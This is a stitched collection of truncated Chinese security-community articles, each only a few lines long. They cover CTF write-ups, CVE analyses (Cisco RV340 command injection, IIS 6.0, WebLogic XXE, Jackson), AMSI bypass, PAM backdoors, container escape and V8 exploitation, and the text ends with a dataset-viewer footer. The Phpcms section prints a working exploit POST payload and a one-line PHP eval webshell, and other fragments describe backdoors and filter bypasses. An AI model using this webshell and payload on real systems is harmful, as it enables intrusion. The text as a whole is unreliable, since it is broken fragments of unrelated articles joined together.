上星期打完TCTF,到现在才有时间整理一下Write Up。Web方向总共只有两道题目,其中一题是 Java,我目前为止还无能为力,另外一题就是这道
WallBreaker Easy。话不多说,开始复现:
## 题目信息:
> Imagick is a awesome library for hackers to break `disable_functions`.
> So I installed php-imagick in the server, opened a `backdoor` for you.
> Let's try to execute `/readflag` to get the fla... | 社区文章 |
## 简介:
QEMU是一套由法布里斯·贝拉(Fabrice
Bellard)所编写的以GPL许可证分发源码的模拟处理器,在GNU/Linux平台上使用广泛。Bochs,PearPC等与其类似,但不具备其许多特性,比如高速度及跨平台的特性,通过KQEMU这个闭源的加速器,QEMU能模拟至接近真实电脑的速度。
qemu和vmware一样,一种虚拟机软件,只不过qemu能够虚拟的平台更加丰富一些。能够虚拟很多嵌入式平台的设备。
在qemu我们可以运行路由器固件,进行调试,以及漏洞挖掘。大大减少研究成本。穷人必备技能。
## 固件下载
从官网 ftp://ftp2.dlink.com/PRODUCTS/ 下载路由器固件,然后用binwal... | 社区文章 |
# DiceCTF 2021 学习笔记
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
前阵子做了一下 Dice CTF 2021,做出了几个 XSS ,本次就写一下包括复现题在内的所有学习笔记。
## Babier CSP
### Description
[Baby CSP](https://2020.justctf.team/challenges/14) was too hard for us, try
Babier CSP.
[babier-csp.dicec.tf](https://babier-csp.dicec.tf/)
[Admin Bot](https://us-east1-... | 社区文章 |
# Cisco命令注入漏洞CVE-2021-1414分析
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 1、概述
最近关注了Cisco的一个命令注入漏洞CVE-2021-1414,命令注入之后可导致远程代码执行:
漏洞存在于固件版本低于V1.0.03.21的RV340系列路由器中,当前最新版本V1.0.03.21已修复了此漏洞。RV340系列路由器可为小型企业提供防火墙和高速上网服务。刚好手头有一个RV340路由器,固件版本为V1.0.03.18,为存在漏洞版本,故实地分析测试了一下。
## 2、漏洞分析
从官网分别下载了V1.0.03.18固件:<https://software.c... | 社区文章 |
来源:[玄武实验室](http://xlab.tencent.com/cn/2017/04/18/nsa-iis-vulnerability-analysis/)
作者: **Ke Liu of Tencent’s Xuanwu Lab**
## 1\. 漏洞简介
### 1.1 漏洞简介
2017年3月27日,来自华南理工大学的 Zhiniang Peng 和 Chen Wu 在 GitHub
[[1](https://github.com/edwardz246003/IIS_exploit)] 上公开了一份 IIS 6.0
的漏洞利用代码,并指明其可能于 2016 年 7 月份或 8 月份被用于黑客攻击活动。
该漏洞的编号为... | 社区文章 |
本文是翻译文章,原文链接为:<https://www.komodosec.com/post/an-accidental-ssrf-honeypot-in-google-calendar>
这是一个我和Google工程师都误以为是Google日历中的SSRF漏洞的故事,最后实际上是因为一些缓存机制的缘故。虽然结果不太好,但是我和Google安全团队的交流很好。
## 从URL导入日历
Google日历有很多不错的功能,其中有一个正如它名字一样,可以通过URL添加一个远程的日历。
Google服务器可以从远程日历上把事件添加到你自己的日历中。或者也可以说是我们使用了Google服务器的HTTP请求。所以访问外部URL是Google服务器... | 社区文章 |
**作者:廖新喜
公众号:<https://mp.weixin.qq.com/s/lU42iaR29n2zI4_v9k1SuA>**
### 背景
按照惯例,Oracle发布了4月份的补丁,详情见链接(<https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html#AppendixFMW>)一看就是一堆漏洞,高危的还好几个。
CVSS 评分为9.8的暂且不分析,我们先来看看wsee模块下的几个XXE漏洞,都是给的7.5的评分。在这些漏洞中要数@Matthias
Kaiser的贡献最大,高危的都是他提交的。
### 简单分析
从补丁对比文件... | 社区文章 |
**作者: pass、neargle @腾讯安全平台部
原文链接:<https://mp.weixin.qq.com/s/Psqy3X3VdUPga7f2cnct1g>**
**本次KCon 2021黑客大会中也有关于容器逃逸的议题,详情请查看:
<https://paper.seebug.org/1748/#container-escape-in-2021>**
## 前言
容器安全是一个庞大且牵涉极广的话题,而容器的安全隔离往往是一套纵深防御的体系,牵扯到AppArmor、Namespace、Capabilities、Cgroup、Seccomp等多项内核技术和特性,但安全却是一处薄弱则全盘皆输的局面,一个新的内核特性可... | 社区文章 |
感谢blue-lotus的大师傅们带来的精彩的比赛!
[TOC]
## Web
### checkin
注意到是1.7.2的beego框架,版本较低。
有文件上传且知道上传目录
参考<https://www.leavesongs.com/PENETRATION/gitea-remote-command-execution.html>
伪造session,poc:
package main
import (
"bytes"
"encoding/gob"
"encoding/hex"
"fmt"
"io/ioutil"
"os... | 社区文章 |
# **Phpcms_V9任意文件上传**
下载最新版Phpcms,在注册页面进行post提交。EXP:
siteid=1&modelid=11&username=123456&password=123456&email=123456@qq.com&info[content]=<img src=http://127.0.0.1/2.txt?.php#.jpg>&dosubmit=1&protocol=
2.txt中写入一句话:
<?php @eval($_POST[cmd]);?>
报错,并返回shell地址。
getshell。 ... | 社区文章 |
# OXID eShop两处漏洞分析
|
##### 译文声明
本文是翻译文章,文章原作者 ripstech,文章来源:blog.ripstech.com
原文地址:<https://blog.ripstech.com/2019/oxid-esales-shop-software/>
译文仅供参考,具体内容表达以及含义原文为准。
## 0x00 前言
RIPS在OXID
eShop软件中检测到了一个高危漏洞,未授权攻击者可以利用该漏洞在几秒之内远程接管使用默认配置的目标站点。此外管理面板中还存在另一个漏洞,攻击者可利用该漏洞获取服务器的远程代码执行(RCE)权限。这里建议用户尽快升级到最新版本。
OXID eShop是源自德国的一套... | 社区文章 |
[TOC]
# PWN-栈溢出原理
## 编写一个无任何保护的ELF文件
程序stack_example.c
#include <stdio.h>
#include <string.h>
void success() { puts("You Hava already controlled it."); }
void vulnerable() {
char s[12];
gets(s);
puts(s);
return;
}
int main(int argc, char **argv) {
vulnerable();
... | 社区文章 |
# ThinkPHP6 反序列化漏洞
### 环境W
`tp6.0 apache php7.3`
## 漏洞分析
反序列化漏洞需要存在 `unserialize()` 作为触发条件,修改入口文件
app/controller/Index.php
注意`tp6`的`url`访问直接是 /控制器/操作/参数…………,相比`tp5`少了模块这个地方,本地测试的需要注意。
全局搜索 `__destruct`
可利用的在`/vendor/topthink/think-orm/src/Model.php` 里
跟进`$this->save()`
去看一下 setAttrs 方法
public function setAttrs(... | 社区文章 |
# Firefox与Edge的dom策略导致的csp bypass问题
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
在2018年对csp研究过一阵,发现可以通过其他的dom向存在CSP的dom注入javascript协议,来达到绕过CSP的安全防护。
众所周知,CSP(内容安全策略)有两种方法来设置,一种是通过浏览器器响应头,如下:
Content-Security-Policy:sc-src 'self' https://apis.google.com
还有一种就是通过<meta>标签进行设置,如下:
<meta http-equiv="Content-Security-P... | 社区文章 |
# 如何绕过AMSI
|
##### 译文声明
本文是翻译文章,文章原作者 contextis,文章来源:contextis.com
原文地址:<https://www.contextis.com/en/blog/amsi-bypass>
译文仅供参考,具体内容表达以及含义原文为准。
## 0x00 前言
AMSI的全称是反恶意软件扫描接口(Anti-Malware Scan Interface),是从Windows
10开始引入的一种机制。AMSI是应用程序和服务能够使用的一种接口,程序和服务可以将“数据”发送到安装在系统上的反恶意软件服务(如Windows
Defender)。
在基于场景的资产评估或者基于数据的红队评估中,许多... | 社区文章 |
# CVE-2018-1158 MikroTik RouterOS漏洞分析之发现CVE-2019-13955
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 漏洞简介
CVE-2018-1158是MikroTik路由器中存在的一个stack
exhaustion漏洞。认证的用户通过构造并发送一个特殊的json消息,处理程序在解析该json消息时会出现递归调用,造成stack
exhaustion,导致对应的服务崩溃重启。
该漏洞由Tenable的Jacob Baines发现,同时提供了对应的PoC脚本。另外,他的关于RouterOS漏洞挖掘的议题《Bug Hunting in
RouterO... | 社区文章 |
**译者:知道创宇404实验室翻译组
原文链接:<https://blog.malwarebytes.com/malwarebytes-news/2020/10/silent-librarian-apt-phishing-attack/>**
## 前言
自复学以来,被称为“Silent Librarian/ TA407 / COBALT DICKENS”的APT组织就一直通过网络钓鱼活动瞄准大学。
9月中旬,一位客户告知我们该APT组织开展的一项新的网络钓鱼活动。基于目标受害者数量庞大,我们得知,APT组织不局限于特定国家,而是试图扩大其覆盖范围。
尽管已经发现并清除了许多网络钓鱼站点,但APT组织已建立了足够的威胁站点以继续... | 社区文章 |
### 先整体说说目标的一个整体概况吧,此目标站点5年之前搞下过它的另外一台服务器,主服务器一直没有搞定,所以这次继续上次没完成的任务,go on
欢迎各位师傅探讨探讨各种姿势
#### 目标站点:
1. 单独服务器——美国加利福尼亚州洛杉矶 hostspaces
2. 在线扫描了一下服务器大体端口开放情况如下,和实际效果应该有点偏差,后续再扫描
Starting Nmap ( http://nmap.org ) at 2017-12-27 18:17 EET
NSE: Loaded 29 scripts for scanning.
Initiating SYN Stealth Scan at 18:... | 社区文章 |
# 【技术分享】骗子们正在利用伪造的苹果应用的内部订阅功能来骗钱
|
##### 译文声明
本文是翻译文章,文章来源:thehackernews.com
原文地址:<http://thehackernews.com/2017/06/apple-subscription-scam.html>
译文仅供参考,具体内容表达以及含义原文为准。
译者:[WisFree](http://bobao.360.cn/member/contribute?uid=2606963099)
预估稿费:150RMB
投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿
在2017年度的苹果开发者大会上,苹果公司对外宣称从App
Store诞生... | 社区文章 |
## 0x00前言
近期Hackerone公开了Gitlab的任意文件写入,导致远程代码执行漏洞,实践一波。
ps:漏洞利用前提:需要有gitlab账户,拥有import project的权限
温馨提示:利用成功后会 **覆盖** 掉原git用户的authorized_keys,在实际生产环境请谨慎尝试,后果自负!
## 0x01漏洞描述
app/services/projects/gitlab_project_import_service.rb
# This service is an adapter used to for the GitLab Import feature, and
# creating... | 社区文章 |
# **阿里巴巴直播内容风险防控中的AI力量**
直播作为近来新兴的互动形态和今年阿里巴巴双十一的一大亮点,其内容风险监控是一个全新的课题,技术的挑战非常大,管控难点主要包括业界缺乏成熟方案和标准、主播行为、直播内容不可控、峰值期间数千路高并发处理、对算法的高实时响应要求等等。
阿里巴巴集团安全部今年在直播管控中的特色在于大量采用人工智能和深度学习等技术,配合优化后的高性能多媒体计算集群,大幅度降低人工审核成本的同时,提升了对内容风险的防控能力。系统在峰值期间成功处理5400路直播视频,以及共计25万场粉丝连连看游戏,对违规内容进行警告或阻断。主要技术体现在直播内容实时过滤以及多媒体处理集群的优化上。
## **1、直播内容... | 社区文章 |
# 【技术分享】CVE-2017-8759的几种利用新姿势
|
##### 译文声明
本文是翻译文章,文章来源:安全客
译文仅供参考,具体内容表达以及含义原文为准。
**
**
**前言**
CVE-2017-8759是FireEye在今年8月底报告给微软的一个office 0day,该漏洞是一个因 **.Net WSDL** 解析器处理
**soap语句**
不当而导致的代码注入漏洞,由于其通用性和易用性,公布以来一直有新的野外利用样本出现。近日,360核心安全事业部高级威胁应对平台捕获一批利用
**CVE-2017-8759** 的新样本,通过分析这些样本,我们观察到一些有趣的利用新姿势,下面来和大家分享一下。
**姿势1:... | 社区文章 |
**关于**
先知社区是一个安全技术社区,旨在为安全技术研究人员提供一个自由、开放、平等的交流平台。
与其他的安全媒体不同,我们秉持自己的态度,我们鼓励原创,鼓励研究,鼓励分享,鼓励学习。我们的使命是为白帽子打造一个最好的社区,让大家在这里获得技术灵感,分享技能,找到伙伴,获得通向目标的加速度,并不断完善自我。
**投稿方式和要求**
**右上角【个人中心】-【创建新帖子】-【节点模块】选择【技术文章】** 。
**投稿类文章,会对内容质量和技术深度有一定要求,模块请选择 技术文章 ,技术文章版块会有现金奖励** 。
其他模块为自由发帖类的不限内容质量和技术深度,发表的帖子不予进行现金奖励,但会进行 **积分奖励**... | 社区文章 |
## 作者: jeary@安百科技
一、为什么需要对日志进行分析?
随着Web技术不断发展,Web被应用得越来越广泛,所谓有价值的地方就有江湖,网站被恶意黑客攻击的频率和网站的价值一般成正比趋势,即使网站价值相对较小,也会面对“脚本小子”的恶意测试攻击或者躺枪于各种大范围漏洞扫描器,正如安全行业的一句话:“世界上只有两种人,一种是知道自己被黑了的,另外一种是被黑了还不知道的”
此时对网站的日志分析就显得特别重要,作为网站管理运维等人员如不能实时的了解服务器的安全状况,则必定会成为“被黑了还不知道的”那一类人,从而造成损失,当然还有一个场景是已经因为黑客攻击造成经济损失,此时我们也会进行日志分析等各种应急措施尽量挽回损失,简而言之日志... | 社区文章 |
# 【知识】6月29日 - 每日安全知识热点
|
##### 译文声明
本文是翻译文章,文章来源:安全客
译文仅供参考,具体内容表达以及含义原文为准。
**热点概要: 网络攻击后,联邦快递暂停其股票交易 **、**
震惊!NotPetya是网络武器而不是勒索软件、星巴克官网博客评论区存在存储型xss、偏执的PlugX病毒(分析) **、** USE-AFTER-SILENCE: vMware悄然修补UAF漏洞、专家发现Skype中存在一个关键的远程缓冲区溢出漏洞 **、 【权威报告】Petya勒索蠕虫完全分析报告
** **、 我是如何找一个影响数千职业网站的持续型XSS的 **、 逆向三星s6 sboot Part II*****... | 社区文章 |
**作者:天融信阿尔法实验室**
**原文链接:<https://mp.weixin.qq.com/s/O1ay4BHiyPBkotNIgDQ6Kg>**
## Hibernate简介
Hibernate是一个开放源代码的对象关系映射框架,它对JDBC进行了非常轻量级的对象封装,它将POJO与数据库表建立映射关系,是一个全自动的orm框架,hibernate可以自动生成SQL语句,自动执行,使得Java程序员可以随心所欲的使用对象编程思维来操纵数据库。
Hibernate可以应用在任何使用JDBC的场合,既可以在Java的客户端程序使用,也可以在Servlet/JSP的Web应用中使用,最具革命意义的是,Hibernate可以在... | 社区文章 |
# 如何在安全风控中评估和量化机器学习有效性
## 0x00 前言
近年来,越来越多的安全厂家把机器学习或人工智能纳入到产品里,但
是实际真正购买或者试用后,往往效果并没有厂商宣称的那么好用,常
常出现大量误报,漏报的情况。如何去评估或者测试这些产品或者机器
学习模型是否能够满足上线的需求以及对现有的防控体系有多少提升,
往往是进行采购或者上线时需要对业务部门说明的基础信息。
本文讨论的是如何去评估以及量化一个机器学习模型的过程,为了方便
描述,本文虚构了一个采购智能识别恶意流量的软件的故事,注意的是
采购这类软件需要考虑的因数非常的多,但是本文只关注有效性以及对
其做出评估。
## 0x01 确认问题
... | 社区文章 |
**作者:[lu4nx](https://www.shellcodes.org/)@知道创宇404积极防御实验室
日期:2021年1月25日**
## 加载 PDB 符号文件
没有加载符号文件,很多函数是显示不出函数名的。如果本地有符号文件(比如用 WinDbg 时已经下载),那直接在"File"菜单选择"Load PDB
File",浏览目录找到 .pdb 或 .xml 文件即可。
如果本地没有,Ghidra 也支持直接从微软服务器下载:
1. 点"File"菜单,选择"Download PDB File...";
2. 弹框确认下载格式是 PDB 还是 XML,选择 PDB;
3. 选择本地保存路径;
4. ... | 社区文章 |
### 文章前言
近期在Github上看到Jackson-databind有两个正在分配CVE的RCE漏洞,本篇文章对其进行简要分析,可算Nday~
### CVE-2020-xxxx(第一则)
#### 影响范围
* jackson-databind before 2.9.10.4
* jackson-databind before 2.8.11.6
* jackson-databind before 2.7.9.7
#### 利用条件
* 开启enableDefaultTyping()
* 使用了com.pastdev.httpcomponents.configuration.JndiConfiguratio... | 社区文章 |
## 0x00 前言
前段时间,看到安全客有观星实验室的师傅写了篇[《基于内存 Webshell
的无文件攻击技术研究》](https://www.anquanke.com/post/id/198886)的文章,他的办法是动态的注册一个自定义的Controller,从而实现一个内存级的Webshell。文章也针对Spring不同的版本做了不同的实践,达到通杀Spring。虽然看起来达到通杀Spring了,但是对于一些非Spring的web框架,是不是就没办法了?这算是其局限吧。
而,最近一段时间,相继看到多个师傅写了一些关于RCE回显的文章,但他们的方法,大多数也是存在着一些局限,当然,我这篇文章要讲的也是局限在tomcat下,不过... | 社区文章 |
原文地址:<https://medium.com/@daniel.thatcher/obtaining-xss-using-moodle-features-and-minor-bugs-2035665989cc>
由于[Moodle](https://moodle.org/ "Moodle")允许用户在只对用户自己可见的仪表板中嵌入任意HTML,这就为self-XSS创造了条件。在这篇文章中,我们将会为读者详细介绍如何利用这种漏洞——设置具有限制路径的第二个会话cookie,并结合登录CSRF漏洞,通过Moodle的内置模拟功能来攻击其他用户。此前,攻击者利用self-XSS漏洞时,通常只能获得DOM的只读访问权限,但利用本文介绍的... | 社区文章 |
# watchdogs挖矿木马综合分析报告
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
2019年2月21日晚,默安科技应急响应中心接到某合作伙伴的求助电话,针对被watchdogs病毒感染的机子进行排查和分析,并最终给出了针对该类型的挖矿病毒的清除工具,帮助客户清除病毒文件,修复被感染机子,挽回经济损失。经默安科技影武者实验室安全研究员分析发现,该病毒是通过Redis未授权访问漏洞及ssh弱口令进行突破植入,随后释放挖矿木马进行挖矿操作,并对内外网主机进行redis漏洞攻击及ssh暴力破解攻击。该病毒有以下几个特征信息:
1、查看netstat命令是否被删除。
2、查看/root/.ssh中... | 社区文章 |
有的时候会写脚本模拟浏览器发请求(比如抢月饼),但是返回结果总是有些差异,想看看问题出在哪里又因为https等其他原因不好抓包的时候,可以试试这个玩意。
<http://requestb.in/>
点击 Create a RequestBin
之后会生成一个url,把你的请求地址改成这个url,之后再刷新一下网页,就可以看到你发过去的http包是什么样子的了。 | 社区文章 |
作者:truebasic
链接: https://www.sec-un.org/我眼中的信息安全意识教育体系/
“唯品会安全应急响应中心”公众号于2017-1-9发布了“魔风”撰写的《唯品会信息安全培训体系》,拜读之后、深为叹服,这是一个有理论、有实践、有改进的信息安全培训体系,值得信息安全从业人员学习、借鉴。本人在甲乙方都做过,在甲方高科技企业(也有人将之归类于制造业)有较长的工作经历,因此在信息安全意识教育方面略有一些心得,受此启发,决心分享一些补充性内容;细节上因个人经历和行业经验和“魔风”有差异,请不吝指正。本文首发Sec-UN,转载请注明。
### 一、 **目标与成熟度**
对于高科技行业、制造业等传统行业(这里... | 社区文章 |
## 前言
渐渐发现 **pam后门** 在实战中存在 **种植繁琐、隐蔽性不强** 等缺点,这里记录下学习pam后门相关知识和pam后门的拓展改进。
* * *
## 0x01 PAM Backdoor
**PAM**
是一种认证模块,PAM可以作为Linux登录验证和各类基础服务的认证,简单来说就是一种用于Linux系统上的用户身份验证的机制。进行认证时首先确定是什么服务,然后加载相应的PAM的配置文件(位于
**/etc/pam.d** ),最后调用认证文件(位于 **/lib/security** )进行安全认证
**简易利用** 的PAM后门也是通过修改 **PAM** 源码中认证的逻辑来达到权限维持
以下为Pam后门种植... | 社区文章 |
# TP5.0.24反序列化链扩展-任意文件读取
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
在学习 [TP5.0.24 反序列化漏洞](https://www.anquanke.com/post/id/196364)
时,发现了一个可控数据库连接从而实现任意文件读取的链子,原理类似这篇文章:[ThinkPHP v3.2.*
(SQL注入&文件读取)反序列化POP链](https://mp.weixin.qq.com/s/S3Un1EM-cftFXr8hxG4qfA)
本文将会根据自己挖掘的思路来写,尽量把调用流程展示清楚,把坑点说明下。并补充些审计时的思考。
## 跳板
**开始的入口跳... | 社区文章 |
# 【技术分享】 解密NotPetya/Petya:恢复MFT
|
##### 译文声明
本文是翻译文章,文章来源:crowdstrike.com
原文地址:<https://www.crowdstrike.com/blog/decrypting-notpetya-tools-for-recovering-your-mft-after-an-attack/>
译文仅供参考,具体内容表达以及含义原文为准。
译者:[myswsun](http://bobao.360.cn/member/contribute?uid=2775084127)
预估稿费:200RMB
投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿
**... | 社区文章 |
在这篇博文中,我将解释我最近在[DOMPurify](https://github.com/cure53/DOMPurify/)\--流行的HTML过滤库中的绕过。简而言之,DOMPurify的工作是将一个不受信任的HTML片段删除所有可能导致跨站点脚本(XSS)的元素和属性。
这是Bypass:
<form>
<math><mtext>
</form><form>
<mglyph>
<style></math><img src onerror=alert(1)>
相信我,这段话中没有一个元素是多余的。
为了理解为什么这段代码能够工作,我需要给你介绍一下HTML规范中的一些有趣的功能,我使... | 社区文章 |
**作者:Kevin2600@星舆实验室
本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org**
## 0x00 前言
大家好, 我是星舆车联网实验室Kevin2600。星舆取 “星辰大海, 舆载万物”之意, 是专注于车联网技术研究,
漏洞挖掘和工具研发的安全团队。团队成员在漏洞挖掘, 硬件逆向与AI大数据方面有着丰富经验, 连续在GeekPwn等破解赛事中斩获奖项,
并获众厂商致谢。团队研究成果多次发表于DEFCON等国内外顶级安全会议。
笔者之前有幸参观了2020北京国际车展, 展会主题是“软件定义汽车”. 几乎每个参展车企都推出至少一款智能汽车. 而最... | 社区文章 |
测试环境:WindowsXP+PHPnow1.6.5+phpwebV2.0.35
在 **base/appplus.php** 文件中,我们发现一处未过滤的文件上传。但是要利用这处任意文件上传,我们得先绕过第15行的密钥校验。
全局搜索下 **md5(strrev($dbUser.$dbPass))** ,看看有没办法将这个值 **leak** 出来。这里共搜出4处,而
**base/post.php** 文件中的代码明显和其他不一样,我们看其具体代码。
我们在 **base/post.php** 文件中,发现当 **$act="appcode"** 时,程序就会将
**md5(strrev($dbUser.$dbPass))** ... | 社区文章 |
#### 0x01 需求场景
在很多次攻防实战或者SRC挖掘过程中,碰到RCE想要反弹shell或者jndi注入时,只有dnslog会产生有效回连,自行nc监听的端口却毫无反应,这就可能遇到了目标防火墙限制出网端口的场景。dnslog是不限制出网端口的,所以不在本文的讨论范围之内,另外本文也不涉及讨论高版本JDK限制JNDI注入remote
codebase的场景。书归正传,比如目标只限制80端口出网,但你nc监听的是80以外的端口(例如8080),那么这种情况下,反弹shell自然不可能成功。大部分人的解决方案是尝试使用
`nc -vlp
常见端口号`的方式进行尝试,例如80、443等。但是很多目标这些常见端口都不一定可以网络放行... | 社区文章 |
**作者:启明星辰ADLab
原文链接:<https://mp.weixin.qq.com/s/8qIleHZpkJ1a5kMQDG5c8A>**
### 一、漏洞概述
2020年10月,谷歌安全研究人员披露了三个Linux内核蓝牙协议栈漏洞,可导致远程代码执行,被称为BleedingTooth。这三个漏洞中,一个是堆溢出,编号为CVE-2020-24490;另一个是类型混淆,编号为CVE-2020-12351,最后一个是信息泄露,编号为CVE-2020-12352。近日,谷歌安全研究人员又披露了BleedingTooth中CVE-2020-12351和CVE-2020-12352组合的漏洞利用及细节,并在蓝牙4.0下,实现了零... | 社区文章 |
# CVE-2021-20090(华硕DSL-AC3100)身份验证绕过漏洞分析
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 0x01 前言
最近Tenable 披露了Arcadyna 网络设备身份验证绕过漏洞,并且很多的厂商都采用产生漏洞的组件,由于Arcadyan
设备固件厂商并没有开源出来,在官网支持里面下载的文件是window和linux
下和设备连接的客户端软件,无法对漏洞点开展分析,这里我们使用同样受影响的华硕产品DSL-AC3100
的固件来进行设备分析。并且复现在网络设备中网络检测ping 功能的远程命令执行漏洞,从而开启设备telentd。
## 0x02 华硕DS... | 社区文章 |
**作者:Hcamael@知道创宇404实验室**
**相关阅读:[从 0 开始学 V8 漏洞利用之环境搭建(一)](https://paper.seebug.org/1820/ "从 0 开始学 V8
漏洞利用之环境搭建(一)")
[从 0 开始学 V8 漏洞利用之 V8 通用利用链(二)](https://paper.seebug.org/1821/ "从 0 开始学 V8
漏洞利用之 V8 通用利用链(二)")
[从 0 开始学 V8 漏洞利用之 starctf 2019 OOB(三)](https://paper.seebug.org/1822/ "从 0 开始学
V8 漏洞利用之 starctf 2019 OOB(... | 社区文章 |
# CS插件之DLL反射加载EXP绕过AV提升权限
## 0x0 前言
本文主要是笔者归纳一些实践经验,针对常见的AV拦截落地提权EXP进行的一些躲避尝试的记录。本文内容并不深入原理,但会尽量说明技术的基本体系和操作的核心步骤,即使你是个萌新,依然可以轻松且愉快地阅读并进行实践。
## 0x1 DLL注入概念
[DLL注入-维基百科](https://zh.wikipedia.org/zh-hans/DLL%E6%B3%A8%E5%85%A5)
> DLL注入(DLL
> Injection)是一种计算机编程技术,它可以强行使另一个进程加载一个动态链接库(DLL)以在其地址空间内运行指定代码。常见用途是改变原先程序的行为,实现程序作... | 社区文章 |
## 前言
如何知道自己所在的企业是否被入侵了?是没人来“黑”,还是因自身感知能力不足,暂时还无法发现?其实,入侵检测是每一个大型互联网企业都要面对的严峻挑战。价值越高的公司,面临入侵的威胁也越大,即便是Yahoo这样的互联网鼻祖,在落幕(被收购)时仍遭遇全量数据失窃的事情。安全无小事,一旦互联网公司被成功“入侵”,其后果将不堪想象。
基于“攻防对抗”的考量,本文不会提及具体的入侵检测模型、算法和策略,那些希望直接照搬“入侵策略”的同学可能会感到失望。但是我们会将一部分运营思路分享出来,请各位同行指点,如能对后来者起到帮助的作用,那就更好了,也欢迎大家跟我们交流探讨。
## 入侵的定义
典型的入侵场景:
>
> 黑客在很远的地方,通... | 社区文章 |
# TokyoWesterns CTF 2019 格式化漏洞利用的新姿势
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 0x01 前言
前天刚结束的TokyoWesterns CTF
2019里碰到一道比较有意思的格式化漏洞利用的题printf,这里分享一下解题思路。与常规fsb题不同的是,printf这题程序自己实现了printf函数。
题目下载:
链接:<https://pan.baidu.com/s/1STlEFK7HoNZbW4JrYRSnIw> 密码:2j77
## 0x02 分析
题目给了3个文件,除了常规的libc还额外给了一个ld.so,ld.so用于装载libc。一般,... | 社区文章 |
Subsets and Splits
Top 100 EPUB Books
This query retrieves a limited set of raw data entries that belong to the 'epub_books' category, offering only basic filtering without deeper insights.